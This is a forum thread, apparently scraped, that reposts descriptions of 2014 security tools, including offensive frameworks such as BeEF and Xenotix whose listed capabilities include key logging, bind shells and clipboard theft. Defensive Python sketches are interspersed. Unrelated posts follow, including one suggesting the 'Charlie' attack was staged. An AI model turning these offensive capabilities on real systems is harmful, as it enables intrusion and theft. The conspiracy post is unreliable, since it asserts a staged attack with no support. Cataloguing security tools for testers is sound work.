Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
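Source-level scanning of the kind Brakeman performs can be caricatured with a pattern pass over the code. Brakeman itself parses the Ruby AST and tracks tainted data flowing into dangerous calls; the naive regex version below only illustrates why no running application stack is needed. The patterns are simplified examples of my own, not Brakeman's real checks.

```python
import re

# Simplified danger patterns for Ruby on Rails source, illustration only.
RISKY_PATTERNS = {
    "possible SQL injection": re.compile(r"\.where\(\s*[\"'].*#\{"),
    "dangerous eval": re.compile(r"\beval\s*\("),
    "possible command injection": re.compile(r"\bsystem\s*\("),
}

def scan_source(source):
    # Report (line number, warning) pairs without ever running the app.
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for warning, pattern in RISKY_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, warning))
    return findings
```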
  14. [h=3]OWASP Offensive (Web) Testing Framework[/h]

OWASP OWTF, the Offensive (Web) Testing Framework, is an OWASP+PTES-focused attempt to unite great tools and make pen testing more efficient, written mostly in Python. The purpose of this tool is to automate the manual, uncreative part of pen testing: for example, spending time trying to remember how to call "tool X", parsing results of "tool X" manually to feed "tool Y", etc.

Features:
- OWASP Testing Guide-oriented
- Report updated on the fly
- "Scumbag spidering"
- Resilience
- Easy to configure
- Easy to run
- Full control of what tests to run
- Easy to review transaction logs and plain text files with URLs
- Basic Google hacking without (annoying) API key requirements via "blanket searches"
- Easy to extract data from the database to parse or pass to other tools

URL: https://www.owasp.org/index.php/OWASP_OWTF
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  15. [h=3]PeStudio[/h]

PeStudio is a unique tool that performs static investigation of 32-bit and 64-bit executables. PeStudio is free for private, non-commercial use only. A malicious executable often attempts to hide its malicious behavior and to evade detection; in doing so, it generally presents anomalies and suspicious patterns. The goal of PeStudio is to detect these anomalies, provide indicators, and score the trustworthiness of the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk.

Features:
- References
- Indicators
- Virus Detection
- Imports
- Resources
- Report
- Prompt
- Interface

URL: winitor
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
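The "file is never started" point can be made concrete with a tiny static check in the spirit of PeStudio: parse the headers from the raw bytes only. The sketch below verifies the DOS 'MZ' magic, follows the e_lfanew field at offset 0x3C, and checks for the 'PE\0\0' signature it points to; a real tool parses far more, of course, and the function name is mine.

```python
import struct

def looks_like_pe(data):
    # Purely static: the bytes are inspected, never executed.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    # e_lfanew at offset 0x3C gives the offset of the NT headers.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"
```

Anything a tool learns this way (imports, resources, anomalies) carries no execution risk for the analyst's machine.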
  16. [h=3]OWASP Xenotix XSS Exploit Framework[/h]

OWASP Xenotix XSS Exploit Framework is an advanced Cross-Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides zero-false-positive XSS detection by performing the scan within the browser engines where, in the real world, payloads get reflected. The Xenotix Scanner Module incorporates 3 intelligent fuzzers to reduce the scan time and produce better results.

Features:
- Scanner Modules
- Information Gathering Modules
- Exploitation Modules
- Auxiliary Modules
- Xenotix Scripting Engine

URL: https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  17. [h=3]BeEF – The Browser Exploitation Framework[/h]

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Features:
- Key Logger
- Bind Shells
- Port Scanner
- Clipboard Theft
- Tor Detection
- Integration with Metasploit Framework
- Many Browser Exploitation Modules
- Browser Functionality Detection
- Mozilla Extension Exploitation Support

URL: http://beefproject.com
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  18. [h=3]Lynis[/h]

Lynis is an auditing tool which tests and gathers (security) information from Unix-based systems. The audience for this tool is security and system auditors, network specialists, and system maintainers. Lynis performs an in-depth local scan on the system and is therefore much more thorough than network-based vulnerability scanners. It starts with the bootloader and goes up to installed software packages. After the analysis it provides the administrator with the discovered findings, including hints to further secure the system.

Features:
- System and security audit checks
- File Integrity Assessment
- System and file forensics
- Usage of templates/baselines (reporting and monitoring)
- Extended debugging features

URL: https://cisofy.com/download/lynis/
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
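An "in-depth local scan" boils down to many small host-side checks like the one sketched below: flagging world-writable files, something a network-based vulnerability scanner cannot see at all. The permission logic is standard Unix; the function names and structure are mine, not Lynis's actual implementation.

```python
import os
import stat

def is_world_writable(mode):
    # True if the 'other' write bit is set in the file mode.
    return bool(mode & stat.S_IWOTH)

def audit_world_writable(paths):
    # Host-based audit step: stat each path locally and flag findings.
    findings = []
    for path in paths:
        try:
            if is_world_writable(os.stat(path).st_mode):
                findings.append(path)
        except OSError:
            continue  # missing/unreadable paths are skipped, not fatal
    return findings
```

A real audit tool chains hundreds of such checks, from bootloader settings up to package versions, and turns the findings into hardening hints.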
  19. [h=3]OWASP ZAP – Zed Attack Proxy Project[/h]

The Zed Attack Proxy (ZAP) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience, and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

Features:
- Open source
- Cross-platform (it even runs on a Raspberry Pi!)
- Easy to install (just requires Java 1.7)
- Completely free (no paid-for 'Pro' version)
- Ease of use a priority
- Comprehensive help pages
- Fully internationalized, translated into over 20 languages
- Community based, with involvement actively encouraged
- Under active development by an international team of volunteers

URL: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
Source: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
  20. Unhide is a forensic tool that finds processes and TCP/UDP ports hidden by rootkits/LKMs or by other hiding techniques. Unhide runs on Unix/Linux and Windows systems. It implements six main techniques.

Features:
- Compare /proc vs /bin/ps output
- Compare info gathered from /bin/ps with info gathered by walking through the procfs (unhide-linux version only)
- Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning)
- Full PID space occupation (PID brute-forcing; unhide-linux version only)
- Compare /bin/ps output vs /proc, procfs walking, and syscalls (unhide-linux version only)
- Reverse search: verify that all threads seen by ps are also seen by the kernel
- Quick compare of /proc, procfs walking, and syscalls vs /bin/ps output (unhide-linux version only); about 20 times faster than tests 1+2+3, but may give more false positives

URL: http://www.unhide-forensics.info
Via: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
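Unhide's first technique (compare /proc against /bin/ps output) is essentially a set difference: any PID the kernel exposes via procfs but which ps does not report is suspect. A minimal sketch, assuming a Linux procfs for the directory walk; the comparison itself is portable and the function names are mine:

```python
import os

def pids_from_procfs():
    # On Linux, every numeric directory under /proc is a PID the
    # kernel exposes, regardless of what userland tools report.
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}

def hidden_pids(proc_pids, ps_pids):
    # Technique 1: present in /proc but missing from ps output.
    return sorted(set(proc_pids) - set(ps_pids))
```

This is exactly the cross-view principle behind rootkit detection: compare two sources of truth that a userland hook can only falsify one of.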
  21. "The 'Big Brother' laws and the prepaid SIM card law do not extend monitoring and do not allow access to the content of phone or electronic communications without a warrant from a judge," assures SRI director George Maior. In an exclusive interview for Ziare.com, George Maior explained the intentions behind the new form of the data retention law and the prepaid card law, and which data the cybersecurity law would make accessible without a judge's warrant: "We cannot act preventively in this era with Sherlock Holmes's tools." The SRI director responded to accusations that Romania's secret services are too powerful and too little controlled, and clarified the undercover officers scandal: "there is a regime of incompatibilities that we hold very dear in operating this exceptional weapon."

Full article: http://www.sri.ro/fisiere/discursuriinterviuri/Interviu_ianuarie_2015.pdf

Question: Isn't the prepaid card law also an extension of monitoring?
Answer: Monitoring of private conversations is not being extended. There simply has to be a record of those who buy these anonymized cards, as there is in a great many European states. I wouldn't say there is a standard, but there is a practice. Go to Germany or the United Kingdom and try to get such a card.

Two people have confirmed that they recently bought cards in Germany and the United Kingdom without an ID. So these people are LYING. Screw them! If such laws get passed, not only in Romania but in other states as well, it means "Charlie" was staged and other attacks invented, for greater control over the population. I know it's just a conspiracy theory, but think about it. // Screw the guard
  22. The tags are for SEO. They do seem like a lot, though. Can anyone tell us whether this is OK or not?
  23. 5 Benefits of a penetration test
January 5, 2015, Adrian Furtuna

Penetration testing projects are definitely fun for passionate pentesters. However, the question is: what are the real benefits of a pentest for the client company? What is the real value of a penetration test? Many clients have misconceptions and false assumptions about penetration testing, and they engage in this type of project for the wrong reasons, like:
- After a penetration test I will be safe
- A penetration test will find all of my vulnerabilities
- I've heard that pentesting is 'sexy', so I would like one myself

Companies who do penetration tests for these reasons do not get the real benefits of this service and are practically throwing away their money. From my perspective, a penetration test has the following true benefits for the client company.

Full article: 5 Benefits of a penetration test – Security Café
  24. The previous Likes will not be recovered. I'll take care of the homepage when I have a bit of time.
  25. I left only Likes and Dislikes in the sidebar. I think that's enough.